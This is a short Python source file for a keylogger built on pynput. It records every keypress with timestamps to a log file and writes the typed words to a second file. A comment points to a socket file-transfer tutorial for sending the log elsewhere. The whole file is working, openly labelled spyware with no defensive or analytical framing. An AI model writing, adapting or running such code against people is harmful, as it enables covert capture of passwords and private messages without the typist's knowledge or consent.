from pynput.keyboard import Key, Listener
import logging
import os

current_dir = os.path.dirname(os.path.abspath(__file__))
logging.basicConfig(filename=(current_dir + "/key_log.txt"), filemode='w', level=logging.DEBUG, format='%(asctime)s: %(message)s', datefmt='%d/%m/%Y %H:%M:%S ')

keys = []
count = 0

def key_press(key):
    global keys, count
    keys.append(key)
    count += 1
    logging.info(str(key))

    # words_log.txt file is written after ever 20 key inputs or when Esc key is pressed to exit the program
    if count >= 20:
        count = 0
        write_file(keys)
        keys.clear()

    # Press Escape to exit the keylogger
    if key == Key.esc:
        write_file(keys)
        keys.clear()
        return False

def write_file(keys):
    # This file only contains words generated by key presses.
    # For transmission of file please refer to: https://linuxhint.com/python_socket_file_transfer_send/

    with open("words_log.txt", "a") as file:
        for key in keys:
            k = str(key).replace("'", "")
            if k.find("space") > 0:
                file.write('\n')
            elif k.find("Key") == -1:
                file.write(k)


with Listener(on_press=key_press) as listener:
    listener.join()
